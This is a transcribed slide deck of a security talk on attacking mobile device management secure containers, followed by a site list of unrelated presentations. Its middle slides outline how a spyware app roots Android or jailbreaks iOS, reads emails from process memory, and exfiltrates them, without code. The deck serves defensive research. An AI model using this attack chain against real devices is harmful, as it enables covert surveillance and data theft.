practical attacks against mobile device management
play

Practical Attacks against Mobile Device Management Solutions - PowerPoint PPT Presentation

Jan 15, 2023 •139 likes •693 views

Practical Attacks against Mobile Device Management Solutions Michael Shaulov, CEO michael@lacoon.com Daniel Brodie, Sr Security Researcher daniel@lacoon.com About: Daniel Security researcher for nearly a decade From PC to Mobile

  1. Practical Attacks against Mobile Device Management Solutions Michael Shaulov, CEO michael@lacoon.com Daniel Brodie, Sr Security Researcher daniel@lacoon.com

  2. About: Daniel • Security researcher for nearly a decade • From PC to Mobile • Researcher and Developer at Lacoon • Developing an App Analysis framework for spyphones and mobile malware

  3. About: Michael • Decade of experience researching and working in the mobile security space From feature-phones to smartphones Mobile Security Research Team Leader at NICE Systems • CEO and co-founder of Lacoon Mobile Security

  4. Targeted Attacks: From PC to Malware Convergence of Personal and Business Ubiquitous Perfect Surveillance Hardware

  5. Targeted Attacks: From PC to Malware 137g Convergence of Personal and Business Ubiquitous Perfect Surveillance Hardware

  6. Targeted Attacks: From PC to Malware Convergence of Personal and Business Ubiquitous Perfect Surveillance Hardware

  7. Agenda • Rise of the spyphones • Introduction to MDM and Secure Containers • Bypassing secure container encryption capabilities • Recommendations and summary

  8. TARGETED MOBILE THREATS

  9. The Mobile Threatscape Business Impact Targeted: Spyphones Personal Organization Cyber espionage Consumer-oriented. Mass. Mobile Financially motivated, e.g.: Malware Premium SMS Apps Fraudulent charges Botnets Complexity

  10. Mobile Remote Access Trojans (aka Spyphones)

  11. Recent High-Profiled Examples

  12. Commercial mRATS

  13. A Double-Edged Sword Back-Up mRAT

  14. Survey: Cellular Network 2M Subscribers Sampling: 500K Infection rates: June 2013: 1 / 800 devices

  15. Survey: Cellular Network 2M Subscribers Sampling: 500K

  16. MDM and SECURE CONTAINERS 101

  17. Mobile Device Management • Policy and configuration management tool • Helps enterprises manage BYOD and mobile computing environment • Offerings include separating between business data and personal data

  18. MDM: Penetration in the Market “Over the 5 years, 65% of enterprises will adopt a mobile device management (MDM) solution for their corporate liable users” Gartner, Inc. October 2012

  19. MDM Key Capabilities • Software management • Network service management • Hardware management • Security management Remote wipe Secure configuration enforcement Encryption

  20. Secure Containers All leading MDM solutions provide secure containers MobileIron AirWatch Fiberlink Zenprise Good Technology

  21. Behind the Scenes: Secure Containers Application Sandbox Secure Communication (SSL) Encrypted Storage Enterprise

  22. MDMs and Secure Containers 3 assumptions:  Encrypt business data  Encrypt communications to the business (SSL/ VPN)  Detect Jailbreak/ Rooting of devices

  23. MDMs and Secure Containers Let’s test these assumptions…

  24. BYPASSING MOBILE DEVICE MANAGEMENT (MDM) SOLUTIONS

  25. Overview Infect the Install Bypass Exfiltrate device Backdoor containerization Information

  26. DEMO ANDROID

  27. Step 1: Infect the Device

  28. Step 1: Technical Details Publish an app through the market Use “Two - Stage”: Download the rest of the dex later and only for the targets we want Get the target to install the app Through spearphishing or physical access to the device

  29. Step 2: Install a Backdoor (i.e. Rooting) Root Any process can run as root user if it is able to trigger a vulnerability in the OS Vulnerability Android device vulnerabilities are abundant Exploit On- Device detection mechanisms can’t look at apps exploiting the vulnerability

  30. Step 2: Technical Details Privilege escalation We used the Exynos exploit (Released Dec., 2012) Create the hidden ‘suid’ binary and use it for specific actions Place in a folder with --x--x--x permissions Undetected by generic root detectors

  31. Step 3: Bypass Containerization Jo, yjod od sm r,so; Storage

  32. Step 3: Bypass Containerization Jo, yjod od sm r,so; Storage

  33. Step 3: Bypass Containerization Jo, yjod Hi, This od sm is an r,so; email Storage Memory

  34. Step 3: Technical Details We listen to events in the log For <= 2.3 we can just use the logging permissions For >4.0 we access the logs as root When an email is read…

  35. Step 4: Exfiltrate Information Jo, yjod Hi, This od sm is an Exfiltrate r,so; email information Storage Memory

  36. Step 4: Technical Details We dump the heap using /proc/<pid>/ maps and /mem Then search for the email structure, extract it, and send it home

  37. DEMO IOS

  38. Step 1: Infect the device

  39. Step 2: Install a Backdoor (i.e. Jailbreaking) Community Jailbroken xCon

  40. Step 2: Technical Details Install signed application Using Enterprise/ Developer certificate Use the Jailbreak To complete the hooking Remove any trace of the Jailbreak

  41. Step 3: Bypass Containerization Load Hook using Get notified Pull the email malicious standard when an from the UI dylib into Objective-C email is read classes memory (it's hooking signed!) mechanisms

  42. MITIGATION TECHNIQUES

  43. MDM MDMs are good for: Management Compliance Enforcement DLP Physical Loss However…

  44. MDM is static and inefficient against the dynamic nature of cybercrime

  46. Do We Have Visibility?

  47. Can We Assess Risk in Real-Time?

  48. Can We Mitigate Targeted Threats?

  50. Attacks are going to happen It’s a question of assessing risk And mitigating the effects

  51. “Life is inherently risky. There is only one big risk you should avoid at all costs, and that is the risk of doing nothing.” Denis Waitley

  52. Risk Metrics / Visibility Vulnerabilities and Usage Is the device up-to-date? Any known vulnerabilities pertaining to the OS? Is the device connecting to a public hotspot? App Behavioral Analysis What is the common app behavior? (static analysis) What is the app doing? (dynamic analysis) Funky Correlation of Events Is the device sending an SMS when the phone is locked?

  53. Risk Metrics / Real-Time Assessment Network Behavioral Analysis • Anomaly detection of communications of apps • Outgoing content inspection (unencrypted) • Blocking of exploit and drive-by attacks

  54. Thank You. Michael Shaulov, CEO michael@lacoon.com Daniel Brodie, Sr Security Researcher daniel@lacoon.com

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Edgefield SS Mobile Device Management Briefing Date: 17 th April 19 Mobile device management

Edgefield SS Mobile Device Management Briefing Date: 17 th April 19 Mobile device management

Edgefield SS Mobile Device Management Briefing Date: 17 th April 19 Mobile device management (MDM) An MDM solution control to deploy, monitor, and manage devices Basic F c Fea eatures in ScreenGuide de [Parent] Configure daily Screen Time

144 views • 12 slides
Towards a Unified Framework for Mobile Device Security Wayne A. Jansen, NIST Mobile Device

Towards a Unified Framework for Mobile Device Security Wayne A. Jansen, NIST Mobile Device

Towards a Unified Framework for Mobile Device Security Wayne A. Jansen, NIST Mobile Device Background* Mobile Device Background* Mobile Device Background* Mobile Device Background* Inexpensive, ubiquitous, wireless, networked,

478 views • 19 slides
RHM Presentation Maas 360 Mobile device management Strong adoption in the enterprise Others

RHM Presentation Maas 360 Mobile device management Strong adoption in the enterprise Others

RHM Presentation Maas 360 Mobile device management Strong adoption in the enterprise Others Manufacturing Financial Consumer Healthcare Public 2 Trusted by over 9,000 customers Recognized Industry Leadership &amp; Certifications

480 views • 15 slides
Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the explosive growth of mobile device market and usage, there is an increasing number of malicious mobile applications targeting these devices and

819 views • 44 slides
Sybil Attacks Against Mobile Users: Friends and Foes to the Rescue Daniele Quercia Stephen

Sybil Attacks Against Mobile Users: Friends and Foes to the Rescue Daniele Quercia Stephen

Sybil Attacks Against Mobile Users: Friends and Foes to the Rescue Daniele Quercia Stephen Hailes By XincenYu What is it about Propose a new decentralized defense for portable devices called MobID Every device manages two small

256 views • 24 slides
Android patching From a Mobile Device Management perspective Cedric Van Bockhaven

Android patching From a Mobile Device Management perspective Cedric Van Bockhaven

Introduction Background information SNE Research Project 2 Kernel patching Evaluation Android patching from the MDM Proof of concept Android patching From a Mobile Device Management perspective Cedric Van Bockhaven cbockhaven@os3.nl

466 views • 20 slides
GUUG FRHJAHRSFACHGESPRCH 2016 Apple OS X und iOS Management Mobile Device Management (MDM)

GUUG FRHJAHRSFACHGESPRCH 2016 Apple OS X und iOS Management Mobile Device Management (MDM)

GUUG FRHJAHRSFACHGESPRCH 2016 Apple OS X und iOS Management Mobile Device Management (MDM) Configuration Profiles &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; &lt;!DOCTYPE plist PUBLIC &quot;-//Apple//DTD PLIST

740 views • 42 slides
1. Mobile Device on the WWW 2. WAP, WML and WMLScript Prof. Dr. Dr. h.c. mult. Gerhard Krger,

1. Mobile Device on the WWW 2. WAP, WML and WMLScript Prof. Dr. Dr. h.c. mult. Gerhard Krger,

1. Mobile Device on the WWW 2. WAP, WML and WMLScript Prof. Dr. Dr. h.c. mult. Gerhard Krger, Albrecht Schmidt 3. Measurement, Management and Control via the WWW Universitt Karlsruhe Fakultt fr Informatik Institut fr Telematik

394 views • 11 slides
MOBILE TOUCHSCREEN UI FARHANA HAQUE TOUCHSCREEN MOBILE Input device: mobile phone Layered

MOBILE TOUCHSCREEN UI FARHANA HAQUE TOUCHSCREEN MOBILE Input device: mobile phone Layered

MOBILE TOUCHSCREEN UI FARHANA HAQUE TOUCHSCREEN MOBILE Input device: mobile phone Layered with special type of glass on top User interact directly on the glass Interaction through finger or stylus HAPTIC FEEDBACK Touch

294 views • 17 slides
Data Collection through Device- to-Device Communications for Mobile Big Data Sensing Hanshang Li,

Data Collection through Device- to-Device Communications for Mobile Big Data Sensing Hanshang Li,

Data Collection through Device- to-Device Communications for Mobile Big Data Sensing Hanshang Li, Ting Li, Xinghua Shi and Yu Wang College of Computing and Informatics University of North Carolina at Charlotte May 17 , 2016 @ The First

566 views • 39 slides
Discussion: Remote Timing Attacks are Practical 600.624 2/11/05 Outline Why are timing

Discussion: Remote Timing Attacks are Practical 600.624 2/11/05 Outline Why are timing

Discussion: Remote Timing Attacks are Practical 600.624 2/11/05 Outline Why are timing attacks important? Clarifications Zero-One Gap / Neighborhood Size etc. Problems Questions Extensions Contribution Discussion

645 views • 26 slides
MOBILE DATA CHARGING: NEW ATTACKS NEW ATTACKS AND COUNTERMEASURES AND COUNTERMEASURES Chunyi

MOBILE DATA CHARGING: NEW ATTACKS NEW ATTACKS AND COUNTERMEASURES AND COUNTERMEASURES Chunyi

MOBILE DATA CHARGING: NEW ATTACKS NEW ATTACKS AND COUNTERMEASURES AND COUNTERMEASURES Chunyi Peng Chunyi Peng , Chi-Yu Li, Guan-Hua Tu, Songwu Lu, Lixia Zhang University of California, Los Angeles ACM CCS12 ACM CCS'12 C Peng (UCLA)

480 views • 27 slides
A Snapshot of the Mobile HTML5 Revolution @ jamespearce The Pledge Single device Multi device

A Snapshot of the Mobile HTML5 Revolution @ jamespearce The Pledge Single device Multi device

A Snapshot of the Mobile HTML5 Revolution @ jamespearce The Pledge Single device Multi device Sedentary user Mobile user * Declarative Imperative Thin client Thick client Documents Applications * or supine, or sedentary, or passive,

1.03k views • 84 slides
Remote Timing Attacks are Practical by David Brumley and Dan Boneh Presented by Seny Kamara in

Remote Timing Attacks are Practical by David Brumley and Dan Boneh Presented by Seny Kamara in

Remote Timing Attacks are Practical by David Brumley and Dan Boneh Presented by Seny Kamara in Advanced Topics in Network Security (600/650.624) Outline Traditional threat model in cryptography Side-channel attacks Kochers

1.19k views • 77 slides
Device Management Jonas Berge Emerson Process Management Malaysia End-User Seminar 1 11

Device Management Jonas Berge Emerson Process Management Malaysia End-User Seminar 1 11

Device Management Jonas Berge Emerson Process Management Malaysia End-User Seminar 1 11 November 2009 Topics What is intelligent device management? Integrated device management Why do I need a handheld field communicator? With

561 views • 33 slides
Practical Padding Oracle Attacks J. Rizzo T. Duong Black Hat Europe, 2010 J. Rizzo, T. Duong

Practical Padding Oracle Attacks J. Rizzo T. Duong Black Hat Europe, 2010 J. Rizzo, T. Duong

Introduction Finding Padding Oracles Basic PO attacks Advanced PO attacks Summary Practical Padding Oracle Attacks J. Rizzo T. Duong Black Hat Europe, 2010 J. Rizzo, T. Duong Practical Padding Oracle Attacks Introduction Finding Padding

1.33k views • 108 slides
Banked Multiported Register Files for High-Frequency Superscalar Microprocessors Jessica H. Tseng

Banked Multiported Register Files for High-Frequency Superscalar Microprocessors Jessica H. Tseng

Banked Multiported Register Files for High-Frequency Superscalar Microprocessors Jessica H. Tseng and Krste Asanovi MIT Laboratory for Computer Science, Cambridge, MA 02139, USA ISCA2003 1 Motivation Increasing demand on number of

661 views • 30 slides
XDP (eXpress Data Path) as a building block for other FOSS projects Jesper Dangaard Brouer (Red

XDP (eXpress Data Path) as a building block for other FOSS projects Jesper Dangaard Brouer (Red

XDP (eXpress Data Path) as a building block for other FOSS projects Jesper Dangaard Brouer (Red Hat) Magnus Karlsson (Intel) FOSDEM 2019 Brussels, Feb 2019 1 Framing XDP XDP: new in-kernel programmable (eBPF) layer before netstack Similar

689 views • 34 slides
the kernel bypass with RDMA! Using the RDMA infrastructure for performance while retaining kernel

the kernel bypass with RDMA! Using the RDMA infrastructure for performance while retaining kernel

Userspace networking: beyond the kernel bypass with RDMA! Using the RDMA infrastructure for performance while retaining kernel integration Benot Ganne, bganne@cisco.com 30/01/2020 1 Why a native network driver? Why userspace networking?

773 views • 8 slides
gpucc: An Open-Source GPGPU Compiler Jingyue Wu (jingyue@google.com) , Eli Bendersky, Mark

gpucc: An Open-Source GPGPU Compiler Jingyue Wu (jingyue@google.com) , Eli Bendersky, Mark

gpucc: An Open-Source GPGPU Compiler Jingyue Wu (jingyue@google.com) , Eli Bendersky, Mark Heffernan, Chris Leary, Jacques Pienaar, Bjarke Roune, Rob Springer, Xuetian Weng, Artem Belevich, Robert Hundt One-Slide Overview Motivation Lack

436 views • 39 slides
Using RDMA Efficiently for Key-Value Services Anuj Kalia (CMU) Michael Kaminsky (Intel Labs),

Using RDMA Efficiently for Key-Value Services Anuj Kalia (CMU) Michael Kaminsky (Intel Labs),

Using RDMA Efficiently for Key-Value Services Anuj Kalia (CMU) Michael Kaminsky (Intel Labs), David Andersen (CMU) 1 RDMA Remote Direct Memory Access: A network feature that allows direct access to the memory of a remote computer. 2 HERD

1.13k views • 34 slides
Buffer Pools Lecture # 05 Database Systems Andy Pavlo AP AP Computer Science 15-445/15-645

Buffer Pools Lecture # 05 Database Systems Andy Pavlo AP AP Computer Science 15-445/15-645

Buffer Pools Lecture # 05 Database Systems Andy Pavlo AP AP Computer Science 15-445/15-645 Carnegie Mellon Univ. Fall 2018 2 UPCO M IN G DATABASE EVEN TS Relational AI Talk Wednesday Sep 12 th @ 4:00pm GHC 8102 MapD Talk

770 views • 76 slides
for General Purpose Processors Zhengrong Wang Prof. Tony Nowatzki 1 Computation &amp; Memory

for General Purpose Processors Zhengrong Wang Prof. Tony Nowatzki 1 Computation &amp; Memory

Stream-based Memory Specialization for General Purpose Processors Zhengrong Wang Prof. Tony Nowatzki 1 Computation &amp; Memory Specialization SIMD Dataflow + + + + + + New ISA abstraction for / certain computation pattern. Core

774 views • 32 slides
universal composability from essentially any trusted setup Mike Rosulek | | CRYPTO 2012 .

universal composability from essentially any trusted setup Mike Rosulek | | CRYPTO 2012 .

universal composability from essentially any trusted setup Mike Rosulek | | CRYPTO 2012 . Example: Set intersection A B ( function evaluation ) Generate a fair coin toss ( randomized ) Online poker without a dealer ( reactive ) secure

882 views • 48 slides

More recommend